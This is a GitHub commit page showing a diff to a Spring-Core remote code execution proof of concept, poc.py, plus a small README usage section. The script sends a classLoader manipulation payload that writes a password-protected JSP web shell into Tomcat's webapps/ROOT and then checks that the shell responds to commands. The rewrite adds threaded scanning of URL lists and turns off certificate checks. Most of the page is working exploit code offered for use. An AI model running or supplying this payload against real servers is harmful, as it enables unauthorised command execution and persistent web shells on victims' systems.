Skip to content

Commit 994debe

Browse files
BobTheShoplifterBobTheShoplifter
authored
Merge pull request #8 from ruped24/main
2 parents fac608b + a1c810d commit 994debe

File tree

2 files changed

+61
-27
lines changed

2 files changed

+61
-27
lines changed

README.md

Lines changed: 5 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -67,6 +67,11 @@ Do a global search after "spring-beans-*.jar" and "spring*.jar"
6767
find . -name spring-beans*.jar
6868
```
6969

70+
## Usage:
71+
```python
72+
poc.py --help
73+
```
74+
7075

7176
WIP :=)
7277

poc.py

Lines changed: 56 additions & 27 deletions
Original file line numberDiff line numberDiff line change
@@ -1,44 +1,73 @@
1+
#! /usr/bin/env python3
12
#coding:utf-8
23

34
import requests
45
import argparse
6+
import urllib3
7+
8+
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
9+
510
from urllib.parse import urljoin
11+
from threading import Thread
12+
from sys import exit
13+
14+
15+
class Exploit(Thread):
16+
17+
def __init__(self, url):
18+
super(self.__class__, self).__init__()
619

7-
def Exploit(url):
8-
headers = {"suffix":"%>//",
9-
"c1":"Runtime",
10-
"c2":"<%",
11-
"DNT":"1",
12-
"Content-Type":"application/x-www-form-urlencoded"
20+
self.url = url
1321

14-
}
15-
data = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
16-
try:
22+
def run(self):
23+
headers = {
24+
"suffix": "%>//",
25+
"c1": "Runtime",
26+
"c2": "<%",
27+
"DNT": "1",
28+
"Content-Type": "application/x-www-form-urlencoded",
29+
}
1730

18-
requests.post(url,headers=headers,data=data,timeout=15,allow_redirects=False, verify=False)
19-
shellurl = urljoin(url, 'tomcatwar.jsp')
20-
shellgo = requests.get(shellurl,timeout=15,allow_redirects=False, verify=False)
21-
if shellgo.status_code == 200:
22-
print(f"Vulnerable,shell ip:{shellurl}?pwd=j&cmd=whoami")
23-
except Exception as e:
24-
print(e)
25-
pass
31+
data = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
2632

33+
try:
34+
requests.post(self.url,
35+
headers=headers,
36+
data=data,
37+
timeout=15,
38+
allow_redirects=False,
39+
verify=False)
40+
shellurl = urljoin(self.url, 'tomcatwar.jsp')
41+
shellgo = requests.get(shellurl,
42+
timeout=15,
43+
allow_redirects=False,
44+
stream=True,
45+
verify=False)
46+
if shellgo.status_code == 200:
47+
print(f"Vulnerable,shell ip:{shellurl}?pwd=j&cmd=whoami")
48+
else:
49+
print(f"\033[91m[" + '\u2718' + "]\033[0m", self.url,
50+
"\033[91mNot Vulnerable!\033[0m ")
2751

52+
except Exception as e:
53+
print(e)
54+
pass
2855

2956

30-
def main():
57+
if __name__ == '__main__':
3158
parser = argparse.ArgumentParser(description='Spring-Core Rce.')
32-
parser.add_argument('--file',help='url file',required=False)
33-
parser.add_argument('--url',help='target url',required=False)
59+
parser.add_argument('--file', help='url file', required=False)
60+
parser.add_argument('--url', help='target url', required=False)
3461
args = parser.parse_args()
62+
3563
if args.url:
36-
Exploit(args.url)
64+
Exploit(args.url).start()
65+
exit()
66+
3767
if args.file:
38-
with open (args.file) as f:
39-
for i in f.readlines():
40-
i = i.strip()
41-
Exploit(i)
68+
with open(args.file) as f:
69+
urls = [i.strip() for i in f.readlines()]
70+
[Exploit(url).start() for url in urls]
4271

43-
if __name__ == '__main__':
44-
main()
72+
else:
73+
parser.print_help()

0 commit comments

Comments
 (0)